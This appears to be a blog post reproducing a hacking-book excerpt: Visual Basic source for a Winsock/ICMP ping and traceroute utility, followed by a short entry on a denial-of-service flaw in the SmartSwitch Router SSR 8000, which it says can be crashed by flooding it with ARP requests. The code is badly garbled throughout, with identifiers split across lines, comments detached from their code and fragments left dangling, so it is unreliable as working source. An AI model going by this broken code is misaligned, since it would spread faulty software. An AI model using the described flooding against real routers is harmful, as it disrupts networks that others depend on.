Else ' Don't worry about trying again on a PING, jus

t timeout

Text3.Text = Text3.Text + "ICMP Request Timeout" +

Chr$(13) + Chr$(10) End If End If Next NbrOfPkts End Sub



Sub vbWSACleanup()

' Subroutine to perform WSACleanup iReturn = WSACleanup()

If iReturn <> 0 Then ' If WSock32 error, then tell me abo

ut

it.

sMsg = "WSock32 Error -" & Trim$(Str$(iReturn)) & " occurred in Cleanup"

MsgBox sMsg, vbOKOnly, "VB4 032-ICMPEcho" End End If End Sub



Sub vbWSAStartup()

iReturn = WSAStartup(&H101, WSAdata)

If iReturn <> 0 Then ' If WSock32 error, then tell me about

it

MsgBox "WSock32.dll is not responding!", vbOKOnly, "VB4032-ICMPEcho" End If

If LoByte(WSAdata.wVersion) < WS_VERSION_MAJOR Or (LoByte(WSAdata.wVersion) = WS_VERSION_MAJOR And HiByte(WSAdata.wVersion) < WS_VERSION_MINOR) Then

sHighByte = Trim$(Str$(HiByte(WSAdata.wVersion))) sLowByte = Trim$(Str$(LoByte(WSAdata.wVersion))) sMsg = "WinSock Version " & sLowByte & "." & sHighByte sMsg = sMsg & " is not supported "

MsgBox sMsg, vbOKOnly, "VB4032-ICMPEcho" End End If

If WSAdata.iMaxSockets < MIN_SOCKETS_REQD Then

sMsg = "This application requires a minimum of "

sMsg = sMsg & Trim$(Str$(MIN_SOCKETS_REQD)) & " supported



sockets."

MsgBox sMsg, vbOKOnly, "VB4032-ICMPEcho" End End If

MaxSockets = WSAdata.iMaxSockets If MaxSockets < 0 Then

MaxSockets = 65536 + MaxSockets

End If

MaxUDP = WSAdata.iMaxUdpDg

If MaxUDP < 0 Then

MaxUDP = 65536 + MaxUDP

End If

description = ""

For i = 0 To WSADESCRIPTION_LEN

If WSAdata.szDescription(i) = 0 Then Exit For description = description + Chr$(WSAdata.szDescription(i

Next i

Status = ""

For i = 0 To WSASYS_STATUS_LEN

If WSAdata.szSystemStatus(i) = 0 Then Exit For Status = Status + Chr$(WSAdata.szSystemStatus(i))

Next i End Sub

Private Sub Command1_Click() Text3.Text = ""

vbWSAStartup ' Initialize Winsock

If Len(Text1.Text) = 0 Then

vbGetHostName

End If

If Text1.Text = "" Then

MsgBox "No Hostname Specified!", vbOKOnly, "VB4032-ICMPEcho"

' Complain if No Host Name Identified

vbWSACleanup Exit Sub End If

vbGetHostByName ' Get the IPAddress for the Host

vbIcmpCreateFile ' Get ICMP Handle

' The following determines the TTL of the ICMPEcho

If IsNumeric(Text2.Text) Then

If (Val(Text2.Text) > 255) Then Text2.Text = "255" If (Val(Text2.Text) < 2) Then Text2.Text = "2"

Else

Text2.Text = "255" End If

pIPo.TTL = Trim$(Text2.Text)

vbIcmpSendEcho ' Send the ICMP Echo Request

vbIcmpCloseHandle ' Close the ICMP Handle

vbWSACleanup ' Close Winsock

End Sub



Private Sub Command2_Click()

Text3.Text = "" End Sub

Private Sub Command3_Click()

Text3.Text = ""

vbWSAStartup ' Initialize Winsock

If Len(Text1.Text) = 0 Then

vbGetHostName

End If

If Text1.Text = "" Then

MsgBox "No Hostname Specified!", vbOKOnly, "VB4032-ICMPEcho"

' Complain if No Host Name Identified vbWSACleanup Exit Sub End If

vbGetHostByName ' Get the IPAddress for the Host

vbIcmpCreateFile ' Get ICMP Handle

' The following determines the TTL of the ICMPEcho for TRACE function

TraceRT = True

Text3.Text = Text3.Text + "Tracing Route to " + Label3.Caption

+

+ Chr$(13) + Chr$(10) + Chr$(13) + Chr$(10)

For TTL = 2 To 255 pIPo.TTL = TTL

vbIcmpSendEcho ' Send the ICMP Echo Request

DoEvents

If RespondingHost = Label3.Caption Then

Text3.Text = Text3.Text + Chr$(13) + Chr$(10) + "Route

Trace

has Completed" + Chr$(13) + Chr$(10) + Chr$(13) + Chr$(10)

Exit For

End If Next TTL TraceRT = False vbIcmpCloseHandle vbWSACleanup End Sub

Stop TraceRT



Close the ICMP Handle

Close Winsock





ICMP.bas:



Type Inet_address

Byte4 As String * 1 Byte3 As String * 1 Byte2 As String * 1 Byte1 As String * 1

End Type

Public IPLong As Inet_address Type WSAdata

wVersion As Integer



wHighVersion As Integer szDescription(0 To 255) As Byte

szSystemStatus(0 To 128) As Byte

iMaxSockets As Integer

iMaxUdpDg As Integer

lpVendorInfo As Long End Type Type Hostent

h_name As Long

h_aliases As Long

h_addrtype As Integer

h_length As Integer

h_addr_list As Long

End Type

Time to Live (used for traceroute) Type of Service (usually 0) IP header Flags (usually 0) Size of Options data (usually 0, ma

' Options data buffer

Type IP_OPTION_INFORMATION

TTL As Byte '

Tos As Byte '

Flags As Byte '

OptionsSize As Long '

x 40)

OptionsData As String * 128 End Type

Replying Address Reply Status Round Trip Time

Public pIPo As IP_OPTION_INFORMATION Type IP_ECHO_REPLY

Address(0 To 3) As Byte

in millisec

Status As Long

RoundTripTime As Long

reply data size for system use pointer to echo data Reply Options

onds

DataSize As Integer Reserved As Integer dat a As Long

Options As IP_OPTION_INFORMATION

End Type

Public pIPe As IP_ECHO_REPLY

Declare Function gethostname Lib "wsock32.dll" (ByVal hostname$,

HostLen&) As Long Declare Function gethostbyname& Lib "wsock32.dll" (ByVal hostname$) Declare Function WSAGetLastError Lib "wsock32.dll" () As Long Declare Function WSAStartup Lib "wsock32.dll" (ByVal wVersionRequir ed&,

lpWSAData As WSAdata) As Long Declare Function WSACleanup Lib "wsock32.dll" () As Long Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (hpvDes

t As

Any, hpvSource As Any, ByVal cbCopy As Long) Declare Function IcmpCreateFile Lib "icmp.dll" () As Long Declare Function IcmpCloseHandle Lib "icmp.dll" (ByVal HANDLE As Lo ng)

As Boolean

Declare Function IcmpSendEcho Lib "ICMP" (ByVal IcmpHandle As Long, ByVal DestAddress As Long, _

ByVal RequestData As String, ByVal RequestSize As Integer,

RequestOptns As IP_OPTION_INFORMATION, _

ReplyBuffer As IP_ECHO_REPLY, ByVal ReplySize As Long, ByVal TimeOut As Long) As Boolean



Denial-of-Service Attack

Synopsis: There is a DoS vulnerability in the SmartSwitch Router (SSR). Hack State: Processing interference with flooding. Vulnerabilities: SSR 8000 running firmware revision 2.x.

Breach: This bottleneck appears to occur in the ARP-handling mechanism of the SSR. Sending an abundance of ARP requests restricts the SSR, causing the router to stop processing. Anonymous attackers crash the SSR by customizing programs like icmp.c (which is available from the Tiger Tools repository on this book's CD).

No comments:

Post a Comment